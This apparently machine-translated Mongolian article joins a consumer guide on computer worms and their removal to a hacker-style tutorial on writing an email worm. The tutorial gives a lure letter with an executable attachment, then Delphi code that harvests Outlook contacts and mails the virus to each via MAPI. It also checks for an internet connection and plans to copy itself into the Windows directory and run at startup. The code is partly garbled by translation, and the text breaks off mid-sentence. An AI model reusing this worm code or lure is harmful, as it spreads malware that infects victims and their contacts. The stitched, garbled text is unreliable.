Компьютерийн вирус, хортой програм - энэ бүхэн үйлдлийн системийг сүйтгэдэг. Юу хийх вэ? Үзэн яддаг вирусын программуудыг хэрхэн ялах вэ? Антивирус суулгахад л хангалттай гэж эхлэгч хэрэглэгчид хэлэх болно. Гэхдээ энэ нь тийм ч энгийн зүйл биш юм. Эцсийн эцэст, вирусыг ялахын тулд та ямар төрлийн вирус болохыг мэдэх хэрэгтэй.

Хамгийн түгээмэл хортой програмуудын нэг бол өт вирус юм. Энэ урилгагүй зочны нэвтрэлтээс компьютерээ хэрхэн хамгаалах вэ, тэр яг юу вэ?

"Өт вирус" гэж юу вэ?

Маш олон төрлийн хортой компьютерийн програм хангамж байдаг. Халдвар авсны дараа арилгахад нэлээд бэрхшээлтэй вирусын нэг нь "сүлжээний өт" вирус юм. Энэ бол дотоод болон дэлхийн сүлжээнд нэвтэрдэг, өөрийгөө хуулбарлах чадвартай компьютерийн програм юм. Үүний зэрэгцээ, энгийн вирус болон энэ хортой програмын хоорондох мэдэгдэхүйц ялгаа нь хоёр дахь нь бүрэн бие даасан байдаг.

Сүлжээний хорхойн төрлүүд

Компьютерийн вирусын хорхойг гурван төрөлд хуваадаг бөгөөд тэдгээр нь шинж чанар, төхөөрөмжид учруулдаг хор хөнөөлөөрөө ихээхэн ялгаатай байдаг.

• Эхний ангилал бол цахим шуудангийн хорхойнууд юм. Тэдгээрийг ихэвчлэн нэг файлд имэйлээр тараадаг. Хэрэглэгч үл мэдэгдэх хүлээн авагчаас хавсралт бүхий захидал хүлээн авдаг. Мэдээжийн хэрэг, сониуч зандаа автаж, тэр өөрөө сүлжээний өт агуулсан хавсралтыг нээдэг бөгөөд үүний дараа халдвар үүсдэг.
• Хортой програмуудын дунд хамгийн түгээмэл байдаг хоёр дахь ангилал нь RAM-д оршин суудаг өтнүүд юм. Энэ вирус нь хатуу дискийг халдварладаггүй, харин RAM-д өөрийгөө оруулдаг бөгөөд ингэснээр ажиллаж байгаа програмуудад хор хөнөөл учруулдаг. Ийм өт вирус "гэртээ харих" тулд компьютераа дахин эхлүүлэхэд хангалттай.
• Гурав дахь бөгөөд хамгийн аюултай ангилал бол төхөөрөмжийн хатуу диск дээрх кодыг хадгалдаг өт юм. Тэдгээрийг ихэвчлэн мэдээлэлд хохирол учруулах, жишээлбэл, DoS халдлага хийхэд ашигладаг. Энд компьютерийг дахин эхлүүлэх нь асуудлыг шийдэхгүй. Зөвхөн өндөр чанартай вирусны эсрэг систем энд туслах болно, тэр ч байтугай бүгд тийм биш. Та халдвар авсан дискийг аль болох эрт эмчилж эхлэх хэрэгтэй, эс тэгвээс бүх үйлдлийн системд баяртай гэж хэлэх хэрэгтэй болно.

Сүлжээний өт хэрхэн, ямар зорилгоор тархдаг вэ?

Ийм вирусыг хакерууд өөр өөр зорилгод хүрэхийн тулд тараадаг. Зарим программууд нь төхөөрөмжийн хяналтыг таслан зогсооход зориулагдсан байдаг. Үүний зэрэгцээ хэрэглэгч өөрөө хорхойн вирус юу хийдгийг хэзээ ч анзаарахгүй. Бусад нь халдвартай компьютерийг орон нутгийн болон дэлхийн аль алинд нь байгаа бүх сүлжээгээр вирус тараах арга болгон ашигладаг.

Хакерууд өтийг тараах олон янзын арга бодож олжээ. Ихэнх тохиолдолд хэрэглэгч эхлээд компьютер дээрээ өөрөө ажиллуулах ёстой вирус байдаг. Энэ нь цахим хавсралт эсвэл интернетээс татаж авсан мини програм байж болно. Гэсэн хэдий ч төхөөрөмжийг халдварлуулахын тулд хэн нэгний оролцоо шаардлагагүй, бие даан нэвтэрдэг хүмүүс байдаг.

Өөрийгөө хэрхэн хамгаалах вэ?

Вирус таны компьютерт халдахаас сэргийлэхийн тулд хамгаалах арга хэмжээний талаар мэдэх хэрэгтэй. Вирусны эсрэг програмууд хангалттай байх болно гэж олон хүн хэлэх болно, учир нь энэ нь вирусыг системд нэвтрэх үед шууд блоклодог. Үнэндээ энэ нь үнэн биш юм. Вирусны эсрэг програм нь тухайн сайт дээр хортой програм илэрсэн гэдгийг анхааруулдаг тул төхөөрөмж рүү өт хорхойг цаг тухайд нь оруулахаас сэргийлж чадахгүй. Ихэнх хэрэглэгчид халдвар авсан файлыг компьютер дээрээ ажиллуулж, татаж авснаар үүнд ач холбогдол өгдөггүй.

Энэ төрлийн програм хангамжаас хамгаалах маш сайн сонголт бол идэвхтэй технологи юм. Ердийн вирусны эсрэг программуудаас ялгаатай нь энэ технологи нь хатуу диск дээр аль хэдийн мэдэгдэж байсан вирусыг хайхаас илүүтэйгээр системийг халдварлахаас сэргийлнэ. Энэ тохиолдолд вирус нь үйлдлийн системд бодит аюул учруулсан тохиолдолд л хаагдах болно.

Сүлжээний өт: вирусыг хэрхэн устгах вэ?

Хэрэв хортой програм таны компьютерт нэвтэрсэн бол та үүнийг даруй устгах хэрэгтэй. Гэхдээ үйлдлийн системийг гэмтээхгүйгээр вирусыг хэрхэн устгах вэ? Ийм нөхцөлд антивирус нь туршлагагүй хэрэглэгчдэд туслах болно. Аз болоход тэдгээрийг суулгахад их цаг хугацаа шаардагдахгүй.

• Касперскийн аврах диск- системийг удирдах замаар хатуу дискийг вирусаас цэвэрлэх боломжийг олгодог програм. Хөтөлбөртэй ажиллаж эхлэхийн тулд та ISO дүрс ашиглан ачаалах дискийг шатаах хэрэгтэй. Тэгээд түүгээр дамжуулан BIOS-д үйлдлийн системийг ажиллуулна уу.
• Касперскийн вирусыг устгах хэрэгсэлШинэхэн хэрэглэгчид болон системийн нарийн ширийнийг хараахан ойлгоогүй хүмүүст илүү тохиромжтой. Энэ нь таны компьютер дээрх хортой програмыг хайж, системээс устгадаг. Гэсэн хэдий ч энэ нь бүх төрлийн вирусыг даван туулж чадахгүй.

• Dr.Web CureItөмнөх вирусны эсрэг програмыг орлуулж магадгүй юм. Үүний асар том сул тал нь хатуу дискийг сканнердах нь маш удаан хугацаа шаарддаг явдал юм. Заримдаа энэ нь арван цаг орчим болдог. Мэдээжийн хэрэг, ийм урт скан хийх нь програм нь файл бүрийг сайтар шалгаж байгаагийн шинж юм. Гэсэн хэдий ч нэг вирусыг хайж өдөржин өнгөрөөх хүсэлтэй хүмүүс тийм ч олон байдаггүй.

Урьдчилан сэргийлэх арга хэмжээ

Вирусаар дамжуулан хакерын халдлагаас өөрийгөө хамгаалахын тулд компьютер дээрээ олон тооны хамгаалалтын програм суулгах шаардлагагүй. Сүлжээнд урьдчилан сэргийлэх арга хэмжээг дагаж мөрдөхөд хангалттай бөгөөд ингэснээр төхөөрөмж рүү нэг ч хортой файл орохгүй.

• Хэрэв та хавсралт бүхий чухал мессежийг имэйлээр хүлээн авбал нээх гэж яарах хэрэггүй. Эхлээд та хавсралтыг дискэнд хадгалж, дараа нь дурын хөтөч ашиглан ажиллуулах хэрэгтэй. Магадгүй текстийн баримт бичиг эсвэл зургийн оронд гүйцэтгэх боломжтой файлыг компьютер дээр хүлээн авсан байж магадгүй юм.
• Та ямар ч тохиолдолд танихгүй хаягаас цахим шуудангаар хүлээн авсан программыг ажиллуулж болохгүй. Төхөөрөмжид хакерын файл ирсэн байх магадлалтай.
• Хавсралт нь аль хэдийн танил болсон имэйлээс ирсэн байсан ч та үүнийг нээх гэж яарах хэрэггүй. Юуны өмнө та үүнийг вирусны эсрэг програмаар сканнердах хэрэгтэй. Захидал ирсэн имэйл хаяг нь хортой програмаар халдварласан байж магадгүй бөгөөд одоо хадгалсан бүх харилцагчид руу мэдээллийн товхимол илгээдэг.
• Илгээсэн хавсралтад вирус агуулагдаж байгаагийн шинж тэмдэг нь мессеж дэх зарим нэг сенсаацтай мэдээ байж магадгүй юм. Энэ нь хэрэглэгчийг контентыг сонирхож, сониуч зангаасаа болж халдвар авсан файлыг нээх өгөөш юм.

Хорхой нь зарим талаараа компьютерийн вирустай төстэй байдаг. Энэ програм нь компьютерийн санах ойд дахин дахин хуулбарлах чадвартай боловч төхөөрөмжийн гүйцэтгэлийг үргэлж тасалдуулж чаддаггүй. Хорхой нь нууцаар ажилладаг бөгөөд илрүүлэхэд тийм ч хялбар биш юм. Зарим програмууд эсвэл үйлдлийн систем өөрөө хөлдөж эхлэхэд энэ нь мэдрэгддэг. Үүний зэрэгцээ өт нь компьютерийн бүх нөөц, түүний дотор програм хангамжийг ашигладаг.

Ер нь өт нь компьютерийн санах ойд нэг програмаар ордог. Вирусаас ялгаатай нь энэ програм нь бие даасан програмуудад хавсардаггүй. Ихэнх тохиолдолд та интернетээр дамжуулан өт барьж болно.

Хамгийн алдартай вирус бол өт юм.

Ердийн жишээ бол "Код унших". Энэ бол Microsoft-ын программ хангамжийг ажиллуулж байгаа компьютеруудыг халдварладаг энгийн интернэт өт юм.Энэ хорхой нь дэлхий даяар 6 сая гаруй серверийг халдварлаж чадсан байна. Санах ойд орсны дараа Code Read нь өөрийн өвөрмөц IP хаягийг ашиглан сүлжээнд байгаа тодорхой компьютер руу халдлага үйлдэж чадна. Хэсэг хугацааны дараа "Worm" багийн хөтөлбөрүүдийн шинэ төлөөлөгчид гарч ирэв - "Код Рид II". Энэ бол ижил төстэй сул тал, үйл ажиллагааны зарчмуудыг хадгалсан илүү түрэмгий ах юм. Түүний цөм нь үйлдлийн системийг бүрэн захирч чадах троян агуулдаг. (Та Трояны талаар илүү ихийг уншиж болно) NIMDA-г дурдахгүй байхын аргагүй. Энэ програмын код нь троян болон нийтлэг өтний хослол юм. Энэ нь хурдан үрждэг нь мэдэгдэж байгаа бөгөөд 8 сая гаруй сүлжээний админуудын сэтгэл санааг аль хэдийн сүйрүүлсэн.

Компьютерээ вирусээс хэрхэн хамгаалах вэ?

Хэд хэдэн энгийн дүрмүүд байдаг бөгөөд тэдгээрийг дагаж мөрдөх нь үйлдлийн системийн аюулгүй байдлыг баталгаажуулдаг.

• Хэрэв та порталын найдвартай байдалд итгэлгүй байгаа бол хажуугаар нь өнгөрнө үү.
• лицензгүй програмуудыг бага ашиглах.
• Та үл мэдэгдэх "туслах" -ын хэлснээр системийн командуудыг оруулах ёсгүй.

Ямар ч антивирус 100% хамгаалалтгүй гэдгийг санаарай.

Вирусаас өөрийгөө хамгаалах өөр олон арга байдаг бөгөөд зөвхөн хамгийн энгийн бөгөөд үр дүнтэй аргуудыг энд тайлбарласан болно. Вирус таны компьютерт нэвтрэхээс урьдчилан сэргийлэхийн тулд вирусны эсрэг програм суулгаж, вирусын мэдээллийн санг илүү олон удаа шинэчлэхийг зөвлөж байна.

Орчин үеийн өт нь хөгжиж, илүү зальтай болох тул та зөвхөн вирусны эсрэг найдах боломжгүй. Цаг хугацаа өнгөрөх тусам вирусууд хүчтэй болдог ч тэдгээрийг илрүүлэх боломжгүй байдаг.

Хамгаалалтын бусад аргууд.

Windows-д суурилуулсан хамгаалалтын систем байдаг - энэ нь виртуал өттэй тэмцэх боломжтой галт хана юм.Үүнээс гадна шинжээчид бүгдийг татаж авахын оронд батлагдсан програмуудыг ашиглахыг зөвлөж байна. Сонгодог вирусыг Firewall Plus ашиглан саармагжуулж болно - троян, keylogger болон бусад муу ёрын сүнснүүдийн эсрэг тэмцэхэд зориулагдсан энгийн програм. World Wide Web бол өт хорхойн дуртай газар гэдгийг санаарай Хавсаргасан файлтай үл мэдэгдэх хүмүүсийн имэйлийг бүү нээ.

Эцэст нь.

Өөр нэг чухал зөвлөгөө. Хортой код нь файл болон хувийн мэдээлэлд хор хөнөөл учруулах зорилготой. Тийм ч учраас, Тусдаа зөөвөрлөгч дээр мэдээллийн нөөц хуулбар үргэлж байх ёстой.Ихэнх өтүүд үнэгүй програмууд бүхий архиваар дамжуулан компьютерт ордог гэдгийг санах нь зүйтэй. Мөн спам нь урилгагүй зочдыг ZIP архивтай имэйл хэлбэрээр авчирч болно гэдгийг санаарай.

Хорхойн төрлүүд нь дараахь шинж чанаруудаас хамааран ялгаатай байдаг: өтийг үржүүлэх арга - энэ нь алсын компьютерт хуулбарыг хэрхэн дамжуулах, халдвар авсан компьютер дээр өтний хуулбарыг ажиллуулах, халдвартай компьютерт нэвтрүүлэх арга. систем, үүнээс гадна полифоризм, үл үзэгдэх болон бусад төрлийн хортой програм хангамж (вирус, троян) зэрэг шинж чанаруудаар.

Имэйлийн хорхойн тухай - Email-Worm

Энэ ангиллын хорхойнууд тархахдаа цахим шуудан ашигладаг гэдгээрээ онцлог юм. Хорхой нь дараах байдлаар ажилладаг: энэ нь өөрийн хуулбарыг имэйлд хавсралт болгон илгээдэг эсвэл сүлжээний эх сурвалжуудын аль нэгэнд байрлах өөрийн файлын холбоосыг, жишээлбэл, хакердсан эсвэл хакерын вэбсайт дээр байрлах халдвартай файлын URL руу илгээдэг. Үүний үр дүнд та халдвар авсан хавсралт эсвэл халдвартай файлын холбоосыг нээх үед өт код идэвхждэг.

Шуудангийн хорхойн халдвартай мессеж илгээх хамгийн түгээмэл арга замууд нь:

• MS Outlook үйлчилгээг ашиглах;
• Windows MAPI функцээр дамжуулан;
• өт кодонд суулгасан шуудангийн санг ашиглан SMTP сервертэй шууд холболтоор дамжуулан.

Имэйлийн хорхойн халдвартай имэйл илгээх имэйл хаягийг олохын тулд ашигладаг аргууд:

• MS Outlook хаягийн дэвтэрт байгаа бүх хаягууд болон шуудангийн хайрцганд байгаа хаягууд руу өөрсдийгөө илгээх боломжтой бөгөөд зарим шуудангийн хорхойнууд шуудангийн хайрцганд байгаа захидалд "хариулах" боломжтой;
• Тэд дискэн дээр байгаа файлуудыг сканнердаж, имэйл хаяг гэж тодорхойлсон мөрүүдийг тодруулдаг.

Үндсэндээ өт нь дээрх хэд хэдэн аргыг нэгэн зэрэг ашигладаг. "Цахим" хаягийг олох өөр аргууд байдаг.

Интернет мессенжер ашигладаг өтнүүд - IM-Worm

Энэ төрлийн өтнүүд үржих цорын ганц аргыг ашигладаг: тэд харилцагчдын жагсаалтад байгаа мессеж бүхий илэрсэн харилцагчид руу өөрсдийгөө илгээдэг; эдгээр харилцагчид нь вэб серверүүдийн аль нэгэнд байрлах файлын URL-г агуулна. Энэ техник нь шуудангийн хорхойн ашигладаг түгээлтийн аргатай бараг адилхан юм.

IRC-Worm - IRC суваг дахь өтнүүд

Имэйл өттэй адил энэ төрлийн өт нь IRC сувгаар тархах хоёр аргатай.

Хоёрдахь арга: халдвар авсан файлыг харамсалтай хэрэглэгч рүү илгээх. Халдлагад өртсөн хэрэглэгч цаг тухайд нь энэ файлыг хүлээн зөвшөөрч, дараа нь дискэнд хадгалаад нээх (ажиллуулах) ёстой.

Net-Worm - бусад сүлжээний өтнүүд

Эхний арга нь өт нь алсын компьютерийг хайж олохыг оролддог бөгөөд үүнийг олсон бөгөөд хэрэв байгаа бол унших, бичихэд нээлттэй лавлах руу хуулдаг. Энэ төрлийн өтнүүд нь үйлдлийн системийн функцуудыг ашиглан сүлжээний боломжтой лавлахуудыг дайран өнгөрч чаддаг. Эсвэл ийм өтнүүд дэлхийн сүлжээн дэх компьютеруудыг санамсаргүй байдлаар хайж, компьютерт холбогдож, бүрэн нэвтрэхийн тулд дискээ нээхийг оролддог.

Хоёрдахь арга нь компьютерийн програм хангамжид ноцтой сул тал байгаа тохиолдолд боломжтой. Эдгээр өтнүүд ийм компьютерийг хайж, тусгайлан зохион бүтээсэн сүлжээний пакет эсвэл хүсэлт (эмзэг байдлын ашиглалт) илгээдэг бөгөөд ингэснээр өтний код нь компьютерт нэвтэрдэг. Хэрэв сүлжээний пакет нь хорхойн кодын зөвхөн нэг хэсгийг агуулж байгаа бол нэвтэрсний дараа үндсэн файлыг татаж аваад гүйцэтгэхээр эхлүүлнэ.

Тусдаа ангилалд түгээхдээ вэб болон FTP серверүүдийг ашигладаг өтнүүд орно. Халдварын процессыг хоёр үе шатанд хувааж болно: эхний шатанд өт нь компьютерийн серверт нэвтэрч, серверийн үйлчилгээний файлуудыг тодорхой байдлаар өөрчилдөг (жишээлбэл, статистикийн вэб хуудсуудыг дурдаж болно). Үүний дараа энэ нь халдвар авсан серверээс мэдээлэл авахыг хүссэн зочдыг хүлээж, улмаар сүлжээнд байгаа бусад компьютерууд руу нэвтэрдэг.

Үндсэндээ компьютерийн өтүүд хуулбаруудаа сүлжээгээр тараахын тулд нэгээс олон аргыг ашигладаг (тэд алсын компьютер руу халдах хоёр ба түүнээс дээш аргатай байж болно).

Файл хуваалцах сүлжээнд зориулсан өтүүд - P2P-Worm

P2P сүлжээнд нэвтрэхийн тулд ийм өт нь ихэвчлэн локал машин дээр байрладаг файл хуваалцах лавлах руу хуулдаг. Бусад бүх зүйл тодорхой утгаараа аяндаа явагдах болно, учир нь P2P сүлжээ нь вирус тараах ажлыг хариуцах болно - сүлжээнээс хайлт хийснээр энэ файлын талаар алсын хэрэглэгчдэд мэдээлэх бөгөөд файлыг татаж авахад шаардлагатай бүх зүйлийг өгөх болно. халдвар авсан компьютер.

Бодит амьдрал дээрх файл хуваалцах системийн сүлжээний протоколыг дуурайж, хайлтын асуулгад эерэг хариу өгөх боломжтой илүү төвөгтэй P2P өтүүд байдаг; энэ тохиолдолд өт нь татаж авахын тулд өөрийн хуулбарыг санал болгодог.

Хорхойн бие биенээсээ ялгарах гол арга бол өт тархах арга юм. Ялгаатай байдлын бусад шинж тэмдгүүд нь халдвар авсан компьютер дээр өтний хуулбарыг ажиллуулах арга, системд нэвтрүүлэх арга, түүнчлэн бусад төрлийн хортой програм хангамжид (вирус, троян) хамаарах полиморфизм, үл үзэгдэх болон бусад шинж чанарууд юм.

Хорхойн төрлүүд

Үйлдлийн системд нэвтрэх аргаас хамааран өтийг дараахь байдлаар хуваана.

• Шуудангийн хорхой(Mail-Worm) - цахим шуудангийн хэлбэрээр тархдаг өтнүүд. Энэ тохиолдолд өт нь өөрийн хуулбарыг цахим шуудангийн хавсралт болгон илгээдэг, эсвэл зарим сүлжээний эх сурвалж дээр байрладаг файлын холбоосыг (жишээлбэл, хакердсан эсвэл хакерын вэбсайтад байрлах халдвартай файлын URL) илгээдэг. Эхний тохиолдолд халдвартай хавсралт нээгдэх үед (хэрэглэхэд), хоёр дахь тохиолдолд халдвар авсан файлын холбоос нээгдэх үед өт код идэвхждэг. Аль ч тохиолдолд үр нөлөө нь адилхан - өтний код идэвхждэг.
• IM өт(IM-Worm) - Интернет мессенжер ашигладаг өтнүүд. Энэ төрлийн мэдэгдэж буй компьютерийн өтнүүд нь тархалтын цорын ганц аргыг ашигладаг - URL агуулсан илэрсэн харилцагчид (холбоо барих жагсаалтаас) зарим вэб сервер дээр байрлах файл руу мессеж илгээх. Энэ техник нь шуудангийн хорхойн ашигладаг ижил төстэй шуудангийн аргыг бараг бүрэн хуулбарладаг.
• P2P өтнүүд(P2P-Worm) - үе тэнгийнхэн хоорондын файл хуваалцах сүлжээг ашиглан тархдаг өтнүүд. Эдгээр өтнүүдийн ихэнх нь ажиллах механизм нь маш энгийн байдаг - P2P сүлжээнд нэвтрэхийн тулд өт нь ихэвчлэн локал машин дээр байрладаг файл хуваалцах лавлах руу хуулах хэрэгтэй. P2P сүлжээ нь вирусыг тараах бусад бүх ажлыг хариуцдаг - сүлжээн дэх файлуудыг хайхдаа энэ файлын талаар алсын хэрэглэгчдэд мэдээлж, халдвар авсан компьютерээс файлыг татаж авахад шаардлагатай бүх үйлчилгээг үзүүлэх болно. Тодорхой файл хуваалцах системийн сүлжээний протоколыг дуурайж, хайлтын хүсэлтэд эерэгээр хариу үйлдэл үзүүлдэг илүү төвөгтэй P2P өтнүүд байдаг - харин өт нь татаж авахын тулд өөрийн хуулбарыг санал болгодог.
• IRC сувгууд дахь өтнүүд(IRC-Worm). Энэ төрлийн өт нь имэйлийн өтнүүдтэй адил дээр дурдсан аргуудыг давтаж IRC сувгаар дамжуулан өтийг тараах хоёр аргатай байдаг. Эхнийх нь өтний хуулбар руу URL илгээх явдал юм. Хоёр дахь арга нь зарим сүлжээний хэрэглэгч рүү халдвар авсан файлыг илгээх явдал юм. Энэ тохиолдолд халдлагад өртсөн хэрэглэгч файлыг хүлээн авснаа баталгаажуулж, дараа нь дискэнд хадгалаад нээх ёстой (гүйцэтгэхийн тулд ажиллуулна).
• Сүлжээний хорхойнууд(Net-Worm) - бусад сүлжээний өтнүүд, тэдгээрийн дотор интернетийн өт болон LAN өтүүдийг ялгах нь зүйтэй.
  • Интернетийн хорхойнууд- тархахдаа интернет протокол ашигладаг өтнүүд. Ихэнхдээ энэ төрлийн өт нь TCP/IP протоколын стекийн үндсэн пакетуудыг зарим программууд буруу боловсруулснаар тархдаг.
  • LAN өтнүүд- дотоод сүлжээний протоколоор дамжин тархдаг өтнүүд

Өнөөдөр би танд сүлжээний вирусын ажиллах зарчмыг тайлбарлах болно. Миний хувийн шуудангийн хайрцгийн 70% нь үргэлж бүх төрлийн вирусээр дүүрэн байдаг тул энэ сэдэв нь таны ойлгож байгаагаар маш их хамааралтай юм.
- жижиг боловч муу VBS хорхойноос эхлээд бага сургуулийн сурагчдын нэг ба хагас мегаграмм бүтээл хүртэл :) Тэд WinAPI байдаг талаар мэдэхгүй :)

Вирус нь компьютерт нэвтрэн орохын тулд хэрэглэгчийн програм хангамжийн алдаа (VBS+Outlook=love :)) эсвэл хэрэглэгчийн толгой дээрх алдааг ашиглаж болно. Ийм вирусын захидлын жишээг харцгаая.

Сэдэв: Хөгжилтэй
Сайн уу? Миний чамд амласан (эсвэл чамд биш, би санахгүй байна :)). Гэхдээ ямар ч байсан хадгал. Санаа зоволтгүй, энэ нь үнэндээ юу ч форматлахгүй!
Шалгахаа бүү мартаарай, паранойд :)
Амжилт хүсье!
Хавсаргана уу: fake_format.exe

За, энд байна: доголон интернет хэрэглэгч бүр найзууддаа хошигнол илгээдэг бөгөөд үүний дагуу хэнд юу амласанаа үнэхээр санахгүй байна; "Хуурамч формат" гэсэн мессеж нь хохирогчийн тархийг хошигнол болгон хувиргаж, вирусны эсрэг сохор итгэдэг.
- дууслаа 🙂 Миний тайлбарласан алгоритмуудыг ямар ч вэб, avp болон бусад тулаанчид тодорхойлдоггүй гэдгийг сануулъя.

Товчхондоо, би өөрөө энэ хөгжилтэй онигоог эхлүүлэхийг хүсч байсан. Би үүнийг эхлүүлж байна :)

Алдаа... intel pentium 5 олдсонгүй!

Өө... бүтэхгүй юм шиг байна? Үгүй ээ, би таамаглаагүй 🙂 Үнэндээ вирус нь хохирогчийн хатуу диск рүү шууд биеийг нь шилжүүлж, эхлүүлэхээр бүртгүүлсэн бөгөөд одоо RAM-д өлгөөтэй байх болно (зөвлөгөө: эмнэлгийн хэлээр "RAM" гэдэг нь хагалгааны мэс засал, Тиймээс болгоомжтой байгаарай;)) "Өөрийгөө хий" гэсэн нийтлэлд дурдсан зарчмын дагуу хохирогчид. Зөвхөн энэ нь файлуудыг эхлүүлэхийг шалгахгүй, харин интернетийн холболтыг шалгах болно 🙂 (эх код дээр энэ нь IsOnline процедур байх болно, тиймээс ирээдүйд;)). Гэсэн хэдий ч нэгэн зэрэг
файлуудыг эхлүүлэхэд танд хэн ч саад болохгүй
- Энэ нь сүлжээний вирус байсан ч вирус хэвээр байна. Тиймээс би InfectFile процедурыг логикт оруулах болно. Тиймээс бид дараах функц, процедурыг ашиглах болно.

ISONLINE - Интернэт холболтыг шалгаж байна
SENDVIRUS - гурван удаа таах 😉
GETMAILS - Outglitch-ийн AddressBook-ээс хаяг авах
ХАЛДВАР - 🙂
WORKMEMORY - өмнөх нийтлэлийнхтэй бараг ижил боловч өөрчлөлттэй.

КОДЛОГЧ

Бодит кодчилол эхлэхээс өмнө, энэ удаад маш олон урьдчилсан халамж шаардлагатай болно :) Би яагаад тайлбарлах болно: хаягийн номыг уншихын тулд бид програм хоорондын интерфэйсээр Outlook руу нэвтрэх болно, үүний тулд бид үүнийг ашиглах нь муу зүйл биш юм. төрлийн номын сан. Тиймээс: төслийн импортын төрлийн номын сан, тэндээс харна уу... зөв, Outlook express v.9 эсвэл танд байгаа бүх зүйл. Ес дэх хувилбар нь би андуураагүй бол Office2k-ийн хувилбар гэж тооцогддог. Импортолсон уу? "Жагсаалтад ороогүй" гэдэг нь юу гэсэн үг вэ? За, болж байна. Гараар хайх
- оффистой лавлахад msoutl.olb файл байна. Ингээд л боллоо 😉 Одоо хэрэглээ хэсэгт outlook_tlb гэж бичвэл та хаягийн дэвтэртээ хамгийн дотно газруудыг үзэх боломжтой болно 🙂 Өө, би өнөөдөр их л завгүй байна 😉
Ерөнхийдөө хаягийн дэвтэрийг задлах журам нь дараах байдалтай байх ёстой.

ашигладаг
ComObj, outlook_tlb,
Маягт;
....
ШУУД АВАХ журам;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Хувилбар; s:мөр;
тоо, i: Бүхэл тоо;
шуудан: мөрийн массив;

Эхлэх
MSOutlook:= CreateOleObject("Outlook.Application");
MyNameSpace:= MSOutlook.GetNameSpace("MAPI");
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength(мэйл, MyFilder.Items.Count);
for i:= 1 to MyFolder.Items.Count do
Эхлэх
MyItem:= MyFolder.Items[i];
мэйл[i]:= myitem.email1addres;
Төгсгөл;

За миний бичсэн зүйл танд таалагдсан уу? Өө, энэ нь улам л дордох болно. Учир нь вирусыг цэвэр API ашиглан илгээх болно. Энэ нь Horrific-ийн хэлснээр: "гар аргаар секстэй адилхан. Аль ч тохиолдолд үр нөлөө байдаг, гэхдээ үүнд хүрэхийн тулд удаан хугацаа шаардагддаг, тийм ч дуу чимээ байхгүй" :)
тэгээд би энд юу бичсэн юм бэ? Comobj ашиглах нь COM технологитой ажиллах боломжийг бидэнд олгодог; Дараа нь бид зүгээр л OLE Outlook объект үүсгэж, түүнээс имэйлийн жагсаалтыг циклээр авдаг. Хэрэв та өөр зүйл олж мэдэхийг хүсч байвал
- энэ нь бас бодит, баримт бичгийг уншина уу - тэд захирдаг. Англи хэл дээр ч гэсэн. Имэйлүүдийн жагсаалтыг динамик массив мөрөнд бичдэг. Үүнийг SendVirus функц ашиглана. Энэ нэг:

функц SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i:бүхэл тоо;
s:мөр;
Эхлэх
MapiRecipDesc-ийн тусламжтайгаар эхлэх хэрэгтэй
ulRecerved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulEIDSize:= 0;
lpEntryID:= тэг;
Төгсгөл;

MapiFileDesc-ээр эхлүүлнэ үү
ulReserved:= 0;
flFlags:= 0;
nБайрлал:= 0;
lpszPathName:= PChar(Хавсралт);
lpszFileName:= nil;
lpFileType:= тэг;
Төгсгөл;

MapiMessage ашиглан эхлүүлнэ үү
ulReserved:= 0;
lpszSubject:= nil;
lpszNoteText:= PChar(Subject);
lpszMessageType:= тэг;
lpszDateReceived:= nil;
lpszConversationID:= nil;
flFlags:= 0;
lpOriginator:= nil;
nRecipCount:= 1;
lpRecips:= @MapiRecipDesc;
хэрвээ урт (Хавсралт) > 0 бол эхэлнэ
nFileCount:= 1;
lpFiles:= @MapiFileDesc;
төгсгөл өөрөөр эхэлнэ
nFileCount:= 0;
lpFiles:= nil;
Төгсгөл;
Төгсгөл;

Үр дүн:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
эсвэл MAPI_LOGON_UI эсвэл MAPI_NEW_SESSION, 0) = АМЖИЛТ_АМЖИЛТ;
Төгсгөл;

Үүнийг уншиж байхдаа хавдсан уу? Очоод шар айраг уу, тэгэхгүй бол чи юу ч ойлгохгүй.
Та уусан уу? Би ч гэсэн 😉 За ингээд үргэлжлүүлье. Та үүнийг дараах байдлаар ашиглах болно.

For i:= 1 to length (мэйл) хийх
Эхлэх
SendVirus("",мэйл[i],"pricol".");
Төгсгөл;

Бид энд MAPI хэрэглээг ашиглах тул үүнийг зарлахаа бүү мартаарай. Товчхондоо энэ
- шуудантай ажиллах доод түвшний ажил. Таны мэдэж байгаагаар шуудантай ажиллахын тулд танд дараах зүйл хэрэгтэй)
хүлээн авагчийн цахим шуудан б) захидал текст в) хавсралт. Энэ бол миний хийдэг зүйл:
MapiRecipDesc ​​- хүлээн авагчийг тайлбарлах, MapiFileDesc - хавсралт,
тэдгээр. Манай вирус, MapiMessage бол мессеж, тэгвэл би MapiSendMail командаар том ертөнц рүү илгээх болно 😉 За тийм ч хэцүү биш болсон. Хамгийн гол нь хамгийн сайн найз гэдгээ ойлгох явдал юм
- энэ бол c:\porno биш, харин win32.hlp :)

Одоо бид энэ бүх үг хэллэгийг вирусын хатуу логикт хэрхэн оруулах вэ? Та үүнийг өөрөө ойлгох болно, би энэ тухай 2 нийтлэл дараалан хэлж байна. Тэгээд ямар ч байсан өчигдөр найз охиныхоо төрсөн өдрийг тэмдэглэсэн, одоо миний толгой бага зэрэг цохилж байна :) За яахав, үүрэг хариуцлага илүү хүчтэй болсон. Зүгээр л хий:
Эхний мөрөнд эхэлсэн файлын нэрийг шалгах хэрэгтэй. Хэрэв
pricol.exe гэдэг нь CopyFile to Windows гэсэн үг :) Мөн хэрэв та Windows лавлахаас эхэлсэн бол
- дараа нь дэлхий даяарх 😉 сүлжээнд холболтоо тогтмол шалгаарай. Бид шалгаж байна:

функц IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
Эхлэх
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Үр дүн:= (Res = 0) ба (dwCount > 0);
Төгсгөл;

Тэгэхээр. Хэрэв бүх зүйл хэвийн байвал хаягийн дэвтэрээ сэгсэрч, шуудангаа явуулаарай. Энд хоёр заль мэх байна. Хэрэв таны нэр
